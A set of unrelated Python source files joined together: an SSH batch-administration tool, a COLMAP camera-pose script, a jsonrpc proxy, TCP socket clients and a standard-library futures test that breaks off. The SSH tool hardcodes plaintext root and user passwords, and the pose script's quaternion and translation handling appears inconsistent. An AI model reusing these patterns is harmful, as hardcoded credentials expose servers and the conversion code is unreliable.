sftp.put(LocalPath,RemotePath) q.put('successful') sftp.close() s.close() Result = '%s \033[32m传送完成\033[m' % PathList return Result def Ssh(host_ip,Operation,user_name,user_pwd,root_name,root_pwd,Cmd=None,PathList=None,port=22): msg = "\033[32m-----------Result:%s----------\033[m" % host_ip try: if Operation == 'Ssh_Cmd': Result = Ssh_Cmd(host_ip=host_ip,Cmd=Cmd,user_name=user_name,user_pwd=user_pwd,port=port) elif Operation == 'Ssh_Su_Cmd': Result = Ssh_Su_Cmd(host_ip=host_ip,Cmd=Cmd,user_name=user_name,user_pwd=user_pwd,root_name=root_name,root_pwd=root_pwd,port=port) elif Operation == 'Ssh_Script': Send_File(host_ip=host_ip,PathList=PathList,user_name=user_name,user_pwd=user_pwd,port=port) Script_Head = open(PathList[0]).readline().strip() LocalPath = re.sub('^\./','',PathList[0].rstrip('/')) Cmd = '%s /tmp/%s' %( re.sub('^#!','',Script_Head), os.path.basename( LocalPath )) Result = Ssh_Cmd(host_ip=host_ip,Cmd=Cmd,user_name=user_name,user_pwd=user_pwd,port=port) elif Operation == 'Ssh_Su_Script': Send_File(host_ip=host_ip,PathList=PathList,user_name=user_name,user_pwd=user_pwd,port=port) Script_Head = 
open(PathList[0]).readline().strip() LocalPath = re.sub('^\./','',PathList[0].rstrip('/')) Cmd = '%s /tmp/%s' %( re.sub('^#!','',Script_Head), os.path.basename( LocalPath )) Result = Ssh_Su_Cmd(host_ip=host_ip,Cmd=Cmd,user_name=user_name,user_pwd=user_pwd,root_name=root_name,root_pwd=root_pwd,port=port) elif Operation == 'Send_File': Result = Send_File(host_ip=host_ip,PathList=PathList,user_name=user_name,user_pwd=user_pwd,port=port) else: Result = '操作不存在' except socket.error: Result = '\033[31m主机或端口错误\033[m' except paramiko.AuthenticationException: Result = '\033[31m用户名或密码错误\033[m' except paramiko.BadHostKeyException: Result = '\033[31mBad host key\033[m[' except IOError: Result = '\033[31m远程主机已存在非空目录或没有写权限\033[m' except: Result = '\033[31m未知错误\033[m' r.put('%s\n%s\n' %(msg,Result)) def Concurrent(Conf,Operation,user_name,user_pwd,root_name,root_pwd,Cmd=None,PathList=None,port=22): # 读取配置文件 f=open(Conf) list = f.readlines() f.close() # 执行总计 total = 0 # 并发执行 for host_info in list: # 判断配置文件中注释行跳过 if host_info.startswith('#'): continue # 取变量,其中任意变量未取到就跳过执行 try: host_ip=host_info.split()[0] #user_name=host_info.split()[1] #user_pwd=host_info.split()[2] except: print('Profile error: %s' %(host_info) ) continue try: port=int(host_info.split()[3]) except: port=22 total +=1 p = multiprocessing.Process(target=Ssh,args=(host_ip,Operation,user_name,user_pwd,root_name,root_pwd,Cmd,PathList,port)) p.start() # 打印执行结果 for j in range(total): print(r.get() ) if Operation == 'Ssh_Script' or Operation == 'Ssh_Su_Script': successful = q.qsize() / 2 else: successful = q.qsize() print('\033[32m执行完毕[总执行:%s 成功:%s 失败:%s]\033[m' %(total,successful,total - successful) ) q.close() r.close() def Help(): print(''' 1.执行命令 2.执行脚本 \033[32m[位置1脚本(必须带脚本头),后可带执行脚本所需要的包\文件\文件夹路径,空格分隔]\033[m 3.发送文件 \033[32m[传送的包\文件\文件夹路径,空格分隔]\033[m 退出: 0\exit\quit 帮助: help\h\? 
注意: 发送文件默认为/tmp下,如已存在同名文件会被强制覆盖,非空目录则中断操作.执行脚本先将本地脚本及包发送远程主机上,发送规则同发送文件 ''') if __name__=='__main__': # 定义root账号信息 root_name = 'root' root_pwd = 'peterli' user_name='peterli' user_pwd='xuesong' # 配置文件 Conf='serverlist.conf' if not os.path.isfile(Conf): print('\033[33m配置文件 %s 不存在\033[m' %(Conf) ) sys.exit() Help() while True: i = raw_input("\033[35m[请选择操作]: \033[m").strip() q = multiprocessing.Queue() r = multiprocessing.Queue() if i == '1': if user_name == root_name: Operation = 'Ssh_Cmd' else: Operation = 'Ssh_Su_Cmd' Cmd = raw_input('CMD: ').strip() if len(Cmd) == 0: print('\033[33m命令为空\033[m') continue Concurrent(Conf=Conf,Operation=Operation,user_name=user_name,user_pwd=user_pwd,root_name=root_name,root_pwd=root_pwd,Cmd=Cmd) elif i == '2': if user_name == root_name: Operation = 'Ssh_Script' else: Operation = 'Ssh_Su_Script' PathList = raw_input('\033[36m本地脚本路径: \033[m').strip().split() if len(PathList) == 0: print('\033[33m路径为空\033[m') continue if not os.path.isfile(PathList[0]): print('\033[33m本地路径 %s 不存在或不是文件\033[m' %(PathList[0]) ) continue for LocalPath in PathList[1:]: if not os.path.exists(LocalPath): print('\033[33m本地路径 %s 不存在\033[m' %(LocalPath) ) break else: Concurrent(Conf=Conf,Operation=Operation,user_name=user_name,user_pwd=user_pwd,root_name=root_name,root_pwd=root_pwd,PathList=PathList) elif i == '3': Operation = 'Send_File' PathList = raw_input('\033[36m本地路径: \033[m').strip().split() if len(PathList) == 0: print('\033[33m路径为空\033[m') continue for LocalPath in PathList: if not os.path.exists(LocalPath): print('\033[33m本地路径 %s 不存在\033[m' %(LocalPath) ) break else: Concurrent(Conf=Conf,Operation=Operation,user_name=user_name,user_pwd=user_pwd,root_name=root_name,root_pwd=root_pwd,PathList=PathList) elif i == '0' or i == 'exit' or i == 'quit': print("\033[34m退出LazyManage脚本\033[m") sys.exit() elif i == 'help' or i == 'h' or i == '?': Help() #END
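Ssh_Cmd above is a thin wrapper around paramiko's exec_command, and Concurrent reads serverlist.conf one host per line (first column is the IP, an optional fourth column is the port, lines starting with '#' are skipped). A minimal standalone Python 3 sketch of the same exec_command pattern, with hypothetical host and credentials:

import paramiko

def run_remote(host, user, password, command, port=22):
    client = paramiko.SSHClient()
    client.load_system_host_keys()
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    client.connect(hostname=host, port=port, username=user, password=password)
    try:
        _stdin, stdout, stderr = client.exec_command(command)
        # Combine stdout and stderr the way Ssh_Cmd does before queueing the result.
        return (stdout.read() + stderr.read()).decode('utf-8', 'replace').strip()
    finally:
        client.close()

# print(run_remote('192.0.2.10', 'peterli', 'secret', 'uptime'))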
workplace_preparation.py
import math import deepdish as dd import shutil import subprocess from os import path, makedirs, remove, listdir from argparse import ArgumentParser from threading import Thread import numpy as np from matplotlib import pyplot as plt number_of_images_in_temp_model = 10 def parse_args() -> str: """ Function to parse user argument :return: workspace_path """ ap = ArgumentParser(description='Create camera_pose files.') ap.add_argument('--workspace_path', required=True) args = vars(ap.parse_args()) return args['workspace_path'] def remove_extra_images(path_to_images: str, number_of_images: int) -> None: """ The function removes all the extra images created in the images folder :param path_to_images: path to the model images folder :param number_of_images: the number of images to reconstruct our model """ last_image = 'image' + str(number_of_images) + '.jpg' while last_image in listdir(path_to_images): last_image_path = path.join(path_to_images, last_image) remove(last_image_path) print(f"remove {last_image}") number_of_images += 1 last_image = 'image' + str(number_of_images) + '.jpg' def prepare_video(path_to_video: str, number_of_images=87) -> None: """ The function prepares the images for our model based on a given video :param path_to_video: video in h264 format :param number_of_images: the number of images to reconstruct our model (87 by default) """ temp_video = path.join(path_to_video, 'temp_outpy.mp4') video = path.join(path_to_video, 'outpy.h264') # create mp4 video for metadata and compute video duration subprocess.run(['ffmpeg', '-i', video, '-c', 'copy', temp_video]) result = subprocess.run(["ffprobe", "-v", "error", "-show_entries", "format=duration", "-of", "default=noprint_wrappers=1:nokey=1", temp_video], stdout=subprocess.PIPE, stderr=subprocess.STDOUT) video_duration = float(result.stdout) # create images folder path_to_images = path.join(path_to_video, 'images') if path.exists(path_to_images) and path.isdir(path_to_images): shutil.rmtree(path_to_images) makedirs(path_to_images) # split the given video into images subprocess.run(['ffmpeg', '-i', temp_video, '-r', str(number_of_images / video_duration), '-f', 'image2', path.join(path_to_images, 'image%d.jpg')]) # remove extra files remove_extra_images(path_to_images, number_of_images) remove(temp_video) def create_temp_model(temp_dir_path: str) -> str: """ The function prepares the images for our model based on a given video :param temp_dir_path: video in h264 format :return number_of_images: path to temporary model folder """ # create temp images folder path_to_temp_model = path.join(temp_dir_path, 'temp_model') path_to_temp_images = path.join(path_to_temp_model, 'temp_images') # remove old temporary folder if exists if path.exists(path_to_temp_model) and path.isdir(path_to_temp_model): shutil.rmtree(path_to_temp_model) number_of_temp_images = 0 path_to_images = path.join(temp_dir_path, 'images') # take only part of the images for the temp model while number_of_temp_images < number_of_images_in_temp_model: try: number_of_temp_images = len([name for name in listdir(path_to_images) if name.endswith('.jpg')]) except FileNotFoundError: number_of_temp_images = 0 # copy subdirectory example shutil.copytree(path_to_images, path_to_temp_images) # run colmap to create model for the first 10 images in video subprocess.run(['colmap', 'automatic_reconstructor', '--workspace_path', path_to_temp_model, '--image_path', path_to_temp_images, '--data_type=video', '--quality=extreme']) return path_to_temp_model def 
quaternion_to_rotation_matrix(q0, q1, q2, q3) -> np: """ The function converts the quaternion vector to a rotation matrix https://automaticaddison.com/how-to-convert-a-quaternion-to-a-rotation-matrix/ :param q0: the value of qw :param q1: the value of qx :param q2: the value of qy :param q3: the value of qz :return rot_matrix: rotation matrix 3x3 as NumPy array """ # First row of the rotation matrix r00 = 2 * (q0 * q0 + q1 * q1) - 1 r01 = 2 * (q1 * q2 - q0 * q3) r02 = 2 * (q1 * q3 + q0 * q2) # Second row of the rotation matrix r10 = 2 * (q1 * q2 + q0 * q3) r11 = 2 * (q0 * q0 + q2 * q2) - 1 r12 = 2 * (q2 * q3 - q0 * q1) # Third row of the rotation matrix r20 = 2 * (q1 * q3 - q0 * q2) r21 = 2 * (q2 * q3 + q0 * q1) r22 = 2 * (q0 * q0 + q3 * q3) - 1 # 3x3 rotation matrix rot_matrix = np.array([[r00, r01, r02], [r10, r11, r12], [r20, r21, r22]]) return rot_matrix def rotation_matrix_to_quaternion(rotation_matrix: np) -> object: """ The function converts rotation matrix to quaternion vector https://learnopencv.com/rotation-matrix-to-euler-angles/ :param rotation_matrix: rotation matrix 3x3 represented by NumPy array :return quaternion vector: defined by (qx, qy, qz, qw) """ cosine_for_pitch = math.sqrt(rotation_matrix[0][0] ** 2 + rotation_matrix[1][0] ** 2) is_singular = cosine_for_pitch < 10 ** -6 if not is_singular: yaw = math.atan2(rotation_matrix[1][0], rotation_matrix[0][0]) pitch = math.atan2(-rotation_matrix[2][0], cosine_for_pitch) roll = math.atan2(rotation_matrix[2][1], rotation_matrix[2][2]) else: yaw = math.atan2(-rotation_matrix[1][2], rotation_matrix[1][1]) pitch = math.atan2(-rotation_matrix[2][0], cosine_for_pitch) roll = 0 e = (yaw, pitch, roll) return euler_to_quaternion(e) def euler_to_quaternion(euler: tuple) -> object: """ The function convert Euler angle to quaternion object :param Euler: angle represented by yaw, pitch, roll :return quaternion vector: defined by (qx, qy, qz, qw) """ (yaw, pitch, roll) = (euler[0], euler[1], euler[2]) qy = np.sin(roll / 2) * np.cos(pitch / 2) * np.cos(yaw / 2) - np.cos(roll / 2) * np.sin(pitch / 2) * np.sin(yaw / 2) qx = np.cos(roll / 2) * np.sin(pitch / 2) * np.cos(yaw / 2) + np.sin(roll / 2) * np.cos(pitch / 2) * np.sin(yaw / 2) qw = np.cos(roll / 2) * np.cos(pitch / 2) * np.sin(yaw / 2) - np.sin(roll / 2) * np.sin(pitch / 2) * np.cos(yaw / 2) qz = np.cos(roll / 2) * np.cos(pitch / 2) * np.cos(yaw / 2) + np.sin(roll / 2) * np.sin(pitch / 2) * np.sin(yaw / 2) return qx, qy, qz, qw def get_first_image_pose(image_src: str) -> list: """ The function return the absolut R & T for the first image in temp model :param image_src: path to image file (colmap output) :return R&T: R = list[0], T list[1] or None if image1 not exists """ # read images file with open(image_src, 'r') as file: lines = file.readlines()[4::2] # create absolut camera pose dictionary for line in lines: columns = line.split() image_name = columns[9].split('.')[0] image_id = int(image_name.split('e')[1]) # convert and return the camera pose for the first image in model if image_id == 1: qw = float(columns[1]) qx = float(columns[2]) qy = float(columns[4]) qz = float(columns[3]) rotation_matrix = quaternion_to_rotation_matrix(qw, qx, qy, qz) tx = float(columns[5]) ty = float(columns[7]) tz = float(columns[6]) translation_vector = np.array([tx, ty, tz]) return [rotation_matrix, translation_vector] return [] def draw_rel_camera_pose(image: int, origin: list, camera_pose: list, plot_dir_path: str) -> None: """ Debug function for plotting the relative camera poses :param image: 
number of current image :param origin: list of [x,y,z] of the origin :param camera_pose: list of [x1,y1,z1][x2,y2,z2] of the camera pose (three 2d vectors) :param plot_dir_path: path to plot directory """ fig = plt.figure() ax = fig.add_subplot(111, projection='3d') ax.view_init(elev=10.) ax.set_title('camera pose image: %d' % image) scale = 7 ax.set_xlim3d(-scale, scale) ax.set_ylim3d(-scale, scale) ax.set_zlim3d(-scale, scale) # replace the Y-Axis with Z-Axis ax.scatter(origin[0], origin[2], origin[1], c='black') for i in range(3): ax.plot([origin[0], camera_pose[i][0]], [origin[2], camera_pose[i][2]], [origin[1], camera_pose[i][1]]) i += 1 fig.savefig(f'{plot_dir_path}/%d.png' % image) plt.close(fig) plt.clf() def compute_absolut_camera_pose(camera_pose_rel_dict: dict, first_image_pose: list, workspace_path: str, do_plot=False) -> dict: """ The function return a dictionary with recovered R&T for each image :param camera_pose_rel_dict: dictionary of relative camera poses for each image :param first_image_pose: absolute R&T of the first image :param workspace_path: path to workspace_path :param do_plot: boolean flag for debug purpose :return: camera_pose_recover dictionary """ # create directory for reference plots ref_pose_images_path = path.join(workspace_path, 'ref_images') if do_plot: makedirs(ref_pose_images_path) # initialize parameters for computing absolut camera poses camera_pose_recover = {} rotation = first_image_pose[0] translation = first_image_pose[1] is_first = True prev_rotation = np.identity(3) prev_translation = np.zeros(3) # foreach image compute the absolut pose out of the reference pose for image in camera_pose_rel_dict.keys(): rel_rotation = camera_pose_rel_dict[image][0] rel_translation = camera_pose_rel_dict[image][1] # for the first image, take the values from the temporary model if not is_first: rotation = rel_rotation @ np.linalg.inv(prev_rotation.T) translation = rel_translation + prev_translation # compute the absolut camera pose camera_pose = rotation + translation if do_plot: draw_rel_camera_pose(image, translation, camera_pose, ref_pose_images_path) # save the values foreach image (in R & T format) camera_pose_recover[image] = [rotation, translation] prev_rotation = rotation prev_translation = translation is_first = False return camera_pose_recover def write_camera_pose_to_file(camera_pose_abs_dict: dict, pose_dir_path: str) -> None: """ The function write the recovered camera poses according to COLMAP documentation :param camera_pose_abs_dict: A dictionary of recovered camera poses for each image :param pose_dir_path: path to image file """ image_dst = path.join(pose_dir_path, 'images.txt') with open(image_dst, 'w+') as file: file.write('# Image list with two lines of data per image:\n') file.write('# IMAGE_ID, QW, QX, QY, QZ, TX, TY, TZ, CAMERA_ID, NAME\n') file.write('# POINTS2D[] as (X, Y, POINT3D_ID)\n') file.write(f'# Number of images: {len(camera_pose_abs_dict.keys())}\n') # write each camera pose to file for image in camera_pose_abs_dict.keys(): image_pose_data = [] t_vector = camera_pose_abs_dict[image][1] qx, qy, qz, qw = rotation_matrix_to_quaternion(camera_pose_abs_dict[image][0]) image_pose_data.append(str(image)) # image_pose_data.append(f'{qw} {qx} {qy} {qz}') image_pose_data.append(f'{qz} {qy} {qx} {qw}') image_pose_data.append(' '.join(map(str, t_vector))) image_pose_data.append('1') image_pose_data.append(f'image{image}.jpg') file.write(' '.join(image_pose_data) + '\n\n') def clear_workspace(workspace_path: str) -> None: """ The function 
deletes all the files in the workspace folder except the input video """ # make sure the workspace in empty for filename in listdir(workspace_path): if filename.endswith('.h264'): continue path_to_node = path.join(workspace_path, filename) if path.isdir(path_to_node): shutil.rmtree(path_to_node) else: remove(path_to_node) def main(): # Parse input arguments: workspace_path = parse_args() clear_workspace(workspace_path) # prepare video and create the images for our model video_thread = Thread(target=prepare_video, args=(workspace_path, 87)) video_thread.start() # create temp folder for temp model temp_model_workspace_path = create_temp_model(workspace_path) # create camera pose parameters pose_output_path = path.join(workspace_path, 'camera_poses') makedirs(pose_output_path) # create camera input file camera_src = path.join(temp_model_workspace_path, 'sparse/0/cameras.txt') camera_dst = path.join(pose_output_path, 'cameras.txt') shutil.copyfile(camera_src, camera_dst) # create an empty points input file points_dst = path.join(pose_output_path, 'points3D.txt') open(points_dst, 'w').close() # get camera poses for first image image_src = path.join(temp_model_workspace_path, 'sparse/0/images.txt') first_image_pose = get_first_image_pose(image_src) if not first_image_pose: print("Error in temp model - cant compute the camera pose for the first image") exit(1) # reading the reference pose model from file camera_pose_rel_dict = dd.io.load('ref_camera_pose.h5') camera_pose_abs_dict = compute_absolut_camera_pose(camera_pose_rel_dict, first_image_pose, workspace_path, do_plot=False) # create the image file according to COLMAP documentation write_camera_pose_to_file(camera_pose_abs_dict, pose_output_path) # wait for the video thread before closing the process video_thread.join() if __name__ == "__main__": print('==============================================================================') print('workplace preparation') print('==============================================================================') main()
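# A hedged sanity check for quaternion_to_rotation_matrix() above (a sketch, not
# part of the pipeline): a 90-degree rotation about the Z axis, qw = cos(45 deg),
# qz = sin(45 deg), should map to the standard Z-rotation matrix. It assumes the
# helper above is in scope (e.g. appended to or imported from this script).
def _check_quaternion_helper():
    qw, qx, qy, qz = math.cos(math.pi / 4), 0.0, 0.0, math.sin(math.pi / 4)
    rot = quaternion_to_rotation_matrix(qw, qx, qy, qz)
    expected = np.array([[0.0, -1.0, 0.0],
                         [1.0, 0.0, 0.0],
                         [0.0, 0.0, 1.0]])
    assert np.allclose(rot, expected, atol=1e-9)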
proxy.py
""" Copyright (c) 2006 Jan-Klaas Kollhof This file is part of jsonrpc. jsonrpc is free software; you can redistribute it and/or modify it under the terms of the GNU Lesser General Public License as published by the Free Software Foundation; either version 2.1 of the License, or (at your option) any later version. This software is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more details. You should have received a copy of the GNU Lesser General Public License along with this software; if not, write to the Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA """ class PeerObjectProxy(object): """creates a peer object which will send requests to the remote service when invoked.""" def __init__(self, name, conn): self._name = name self._conn = conn def notify(self, *args): self._conn.sendNotify(self._name, args) def __call__(self, *args): evt = self._conn.sendRequest(self._name, args) return evt.waitForResponse() def __getattr__(self, name): return PeerObjectProxy(self._name + "." + name, self._conn) class PeerProxy: def __init__(self, connectionHandler): self._connectionHandler = connectionHandler def __getattr__(self, name): return PeerObjectProxy(name, self._connectionHandler) import re class ServiceProxy(PeerProxy): def __init__(self, url, localService=None, messageDelimiter=""): m = re.match(r"^jsonrpc:\/\/(.*):(\d*)$", url) if m: from jsonrpc.socketserver import SocketServiceHandler import socket from threading import Thread (host, port)= m.groups() port = int(port) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) conn = SocketServiceHandler(s, localService,messageDelimiter=messageDelimiter) PeerProxy.__init__(self, conn) t=Thread(target=conn.receiveForever) t.setDaemon(True) t.start() else: from jsonrpc.http import HTTPClientConnectionHandler conn= HTTPClientConnectionHandler(url, localService,messageDelimiter=messageDelimiter) PeerProxy.__init__(self, conn)
tcp_client.py
""" tcp连接接收数据 """ # TCPclient.py import socket class TcpClient: def __init__(self): self.target_host = "116.62.44.118" # 服务器端地址 self.target_port = 3389 # 必须与服务器的端口号一致 def start(self): while True: client = socket.socket(socket.AF_INET,socket.SOCK_STREAM) client.connect((self.target_host,self.target_port)) data = input(">") if not data: break client.send(data.encode()) response = client.recv(1024) print(response) client.close() if __name__ == '__main__': obj = TcpClient() obj.start() # # # import socket # import threading # client_list = [] # def read_server(client_socket): # while True: # content = client_socket.recv(2048).decode('UTF-8') # if content is not None: # print("content:",content) # # client_socket = socket.socket(socket.AF_INET,socket.SOCK_STREAM) # ## 绑定USR-K7 开启的IP地址和端口号 # client_socket.connect(('192.168.0.7',23)) # threading.Thread(target=read_server,args=(client_socket,)).start() # while True: # line = input('') # if line is None or line =='exit': # break # client_socket.send(line.encode("UTF-8"))
SocketClient.py
# -*- coding: utf-8 -*-
"""
Created on Mon Jul 9 20:41:03 2018

@author: 康文洋 kangwenyangde@163.com、陈祚松、夏萍萍、艾美珍、陈兰兰、张梦丽、易传佳
"""
import socket
import threading


class SocketClient:
    # constructor
    def __init__(self, host, port, mainpanel):
        self.Host = host
        self.Port = port
        self.Mainpanel = mainpanel
        self.client = socket.socket()
        # self.IsConnected = False

    def ConnectServer(self):
        try:
            self.client.connect((self.Host, self.Port))
            thread = threading.Thread(target=self.Client_handle)
            thread.start()
            return True
        except Exception as e:
            return False
        finally:
            pass

    def Client_handle(self):
        while True:
            try:
                # control command received from the server
                data = self.client.recv(2048)
                if not data:
                    pass
                else:
                    # process the received packet
                    self.Mainpanel.Receive(data)  # return the result
                # connection state is True
            except Exception as e:
                print("break")
                # connection state is False
                break

    def SendMessage(self, message):
        try:
            self.client.send(message.encode('UTF-8'))
            # self.Receive()
            return True
        except Exception as e:
            return False
        finally:
            pass

    # def Receive(self):
    #     try:
    #         data = self.client.recv(1024)
    #         self.Mainpanel.Receive(data)
    #         return True
    #     except Exception as e:
    #         return False
    #     finally:
    #         pass

    def IsConnected(self):
        try:
            self.client.getpeername()
            return True
        except Exception as e:
            return False
        finally:
            pass

    def GetServerInfo(self):
        try:
            result = self.client.getpeername()
            return result
        except Exception as e:
            return ('127.0.0.1', 0)
        finally:
            pass

    def CloseConnect(self):
        try:
            self.client.close()
            return True
        except Exception as e:
            return False
        finally:
            pass
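# A minimal wiring sketch for SocketClient above (an illustrative addition, not
# part of the original GUI): "mainpanel" only needs a Receive(data) method, so a
# small stub is enough to exercise the class offline. The host/port values are
# placeholders.
class _StubPanel:
    def Receive(self, data):
        print("panel got:", data)


if __name__ == '__main__':
    client = SocketClient('127.0.0.1', 9999, _StubPanel())
    print(client.IsConnected())      # False until ConnectServer() succeeds
    # client.ConnectServer()         # would start Client_handle in a thread
    # client.SendMessage("hello")    # UTF-8 encodes and sends over the socket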
test_concurrent_futures.py
import test.support # Skip tests if _multiprocessing wasn't built. test.support.import_module('_multiprocessing') # Skip tests if sem_open implementation is broken. test.support.import_module('multiprocessing.synchronize') # import threading after _multiprocessing to raise a more revelant error # message: "No module named _multiprocessing". _multiprocessing is not compiled # without thread support. test.support.import_module('threading') from test.script_helper import assert_python_ok import sys import threading import time import unittest from concurrent import futures from concurrent.futures._base import ( PENDING, RUNNING, CANCELLED, CANCELLED_AND_NOTIFIED, FINISHED, Future) import concurrent.futures.process def create_future(state=PENDING, exception=None, result=None): f = Future() f._state = state f._exception = exception f._result = result return f PENDING_FUTURE = create_future(state=PENDING) RUNNING_FUTURE = create_future(state=RUNNING) CANCELLED_FUTURE = create_future(state=CANCELLED) CANCELLED_AND_NOTIFIED_FUTURE = create_future(state=CANCELLED_AND_NOTIFIED) EXCEPTION_FUTURE = create_future(state=FINISHED, exception=IOError()) SUCCESSFUL_FUTURE = create_future(state=FINISHED, result=42) def mul(x, y): return x * y def sleep_and_raise(t): time.sleep(t) raise Exception('this is an exception') def sleep_and_print(t, msg): time.sleep(t) print(msg) sys.stdout.flush() class ExecutorMixin: worker_count = 5 def setUp(self): self.t1 = time.time() try: self.executor = self.executor_type(max_workers=self.worker_count) except NotImplementedError as e: self.skipTest(str(e)) self._prime_executor() def tearDown(self): self.executor.shutdown(wait=True) dt = time.time() - self.t1 if test.support.verbose: print("%.2fs" % dt, end=' ') self.assertLess(dt, 60, "synchronization issue: test lasted too long") def _prime_executor(self): # Make sure that the executor is ready to do work before running the # tests. This should reduce the probability of timeouts in the tests. futures = [self.executor.submit(time.sleep, 0.1) for _ in range(self.worker_count)] for f in futures: f.result() class ThreadPoolMixin(ExecutorMixin): executor_type = futures.ThreadPoolExecutor class ProcessPoolMixin(ExecutorMixin): executor_type = futures.ProcessPoolExecutor class ExecutorShutdownTest(unittest.TestCase): def test_run_after_shutdown(self): self.executor.shutdown() self.assertRaises(RuntimeError, self.executor.submit, pow, 2, 5) def test_interpreter_shutdown(self): # Test the atexit hook for shutdown of worker threads and processes rc, out, err = assert_python_ok('-c', """if 1: from concurrent.futures import {executor_type} from time import sleep from test.test_concurrent_futures import sleep_and_print t = {executor_type}(5) t.submit(sleep_and_print, 1.0, "apple") """.format(executor_type=self.executor_type.__name__)) # Errors in atexit hooks don't change the process exit code, check # stderr manually. 
self.assertFalse(err) self.assertEqual(out.strip(), b"apple") class ThreadPoolShutdownTest(ThreadPoolMixin, ExecutorShutdownTest): def _prime_executor(self): pass def test_threads_terminate(self): self.executor.submit(mul, 21, 2) self.executor.submit(mul, 6, 7) self.executor.submit(mul, 3, 14) self.assertEqual(len(self.executor._threads), 3) self.executor.shutdown() for t in self.executor._threads: t.join() def test_context_manager_shutdown(self): with futures.ThreadPoolExecutor(max_workers=5) as e: executor = e self.assertEqual(list(e.map(abs, range(-5, 5))), [5, 4, 3, 2, 1, 0, 1, 2, 3, 4]) for t in executor._threads: t.join() def test_del_shutdown(self): executor = futures.ThreadPoolExecutor(max_workers=5) executor.map(abs, range(-5, 5)) threads = executor._threads del executor for t in threads: t.join() class ProcessPoolShutdownTest(ProcessPoolMixin, ExecutorShutdownTest): def _prime_executor(self): pass def test_processes_terminate(self): self.executor.submit(mul, 21, 2) self.executor.submit(mul, 6, 7) self.executor.submit(mul, 3, 14) self.assertEqual(len(self.executor._processes), 5) processes = self.executor._processes self.executor.shutdown() for p in processes: p.join() def test_context_manager_shutdown(self): with futures.ProcessPoolExecutor(max_workers=5) as e: processes = e._processes self.assertEqual(list(e.map(abs, range(-5, 5))), [5, 4, 3, 2, 1, 0, 1, 2, 3, 4]) for p in processes: p.join() def test_del_shutdown(self): executor = futures.ProcessPoolExecutor(max_workers=5) list(executor.map(abs, range(-5, 5))) queue_management_thread = executor._queue_management_thread processes = executor._processes del executor queue_management_thread.join() for p in processes: p.join() class WaitTests(unittest.TestCase): def test_first_completed(self): future1 = self.executor.submit(mul, 21, 2) future2 = self.executor.submit(time.sleep, 1.5) done, not_done = futures.wait( [CANCELLED_FUTURE, future1, future2], return_when=futures.FIRST_COMPLETED) self.assertEqual(set([future1]), done) self.assertEqual(set([CANCELLED_FUTURE, future2]), not_done) def test_first_completed_some_already_completed(self): future1 = self.executor.submit(time.sleep, 1.5) finished, pending = futures.wait( [CANCELLED_AND_NOTIFIED_FUTURE, SUCCESSFUL_FUTURE, future1], return_when=futures.FIRST_COMPLETED) self.assertEqual( set([CANCELLED_AND_NOTIFIED_FUTURE, SUCCESSFUL_FUTURE]), finished) self.assertEqual(set([future1]), pending) def test_first_exception(self): future1 = self.executor.submit(mul, 2, 21) future2 = self.executor.submit(sleep_and_raise, 1.5) future3 = self.executor.submit(time.sleep, 3) finished, pending = futures.wait( [future1, future2, future3], return_when=futures.FIRST_EXCEPTION) self.assertEqual(set([future1, future2]), finished) self.assertEqual(set([future3]), pending) def test_first_exception_some_already_complete(self): future1 = self.executor.submit(divmod, 21, 0) future2 = self.executor.submit(time.sleep, 1.5) finished, pending = futures.wait( [SUCCESSFUL_FUTURE, CANCELLED_FUTURE, CANCELLED_AND_NOTIFIED_FUTURE, future1, future2], return_when=futures.FIRST_EXCEPTION) self.assertEqual(set([SUCCESSFUL_FUTURE, CANCELLED_AND_NOTIFIED_FUTURE, future1]), finished) self.assertEqual(set([CANCELLED_FUTURE, future2]), pending) def test_first_exception_one_already_failed(self): future1 = self.executor.submit(time.sleep, 2) finished, pending = futures.wait( [EXCEPTION_FUTURE, future1], return_when=futures.FIRST_EXCEPTION) self.assertEqual(set([EXCEPTION_FUTURE]), finished) self.assertEqual(set([future1]), 
pending) def test_all_completed(self): future1 = self.executor.submit(divmod, 2, 0) future2 = self.executor.submit(mul, 2, 21) finished, pending = futures.wait( [SUCCESSFUL_FUTURE, CANCELLED_AND_NOTIFIED_FUTURE, EXCEPTION_FUTURE, future1, future2], return_when=futures.ALL_COMPLETED) self.assertEqual(set([SUCCESSFUL_FUTURE, CANCELLED_AND_NOTIFIED_FUTURE, EXCEPTION_FUTURE, future1, future2]), finished) self.assertEqual(set(), pending) def test_timeout(self): future1 = self.executor.submit(mul, 6, 7) future2 = self.executor.submit(time.sleep, 3) finished, pending = futures.wait( [CANCELLED_AND_NOTIFIED_FUTURE, EXCEPTION_FUTURE, SUCCESSFUL_FUTURE, future1, future2], timeout=1.5, return_when=futures.ALL_COMPLETED) self.assertEqual(set([CANCELLED_AND_NOTIFIED_FUTURE, EXCEPTION_FUTURE, SUCCESSFUL_FUTURE, future1]), finished) self.assertEqual(set([future2]), pending) class ThreadPoolWaitTests(ThreadPoolMixin, WaitTests): pass class ProcessPoolWaitTests(ProcessPoolMixin, WaitTests): pass class AsCompletedTests(unittest.TestCase): # TODO(brian@sweetapp.com): Should have a test with a non-zero timeout. def test_no_timeout(self): future1 = self.executor.submit(mul, 2, 21) future2 = self.executor.submit(mul, 7, 6) completed = set(futures.as_completed( [CANCELLED_AND_NOTIFIED_FUTURE, EXCEPTION_FUTURE, SUCCESSFUL_FUTURE, future1, future2])) self.assertEqual(set( [CANCELLED_AND_NOTIFIED_FUTURE, EXCEPTION_FUTURE, SUCCESSFUL_FUTURE, future1, future2]), completed) def test_zero_timeout(self): future1 = self.executor.submit(time.sleep, 2) completed_futures = set() try: for future in futures.as_completed( [CANCELLED_AND_NOTIFIED_FUTURE, EXCEPTION_FUTURE, SUCCESSFUL_FUTURE, future1], timeout=0): completed_futures.add(future) except futures.TimeoutError: pass self.assertEqual(set([CANCELLED_AND_NOTIFIED_FUTURE, EXCEPTION_FUTURE, SUCCESSFUL_FUTURE]), completed_futures) class ThreadPoolAsCompletedTests(ThreadPoolMixin, AsCompletedTests): pass class ProcessPoolAsCompletedTests(ProcessPoolMixin, AsCompletedTests): pass class ExecutorTest(unittest.TestCase): # Executor.shutdown() and context manager usage is tested by # ExecutorShutdownTest. 
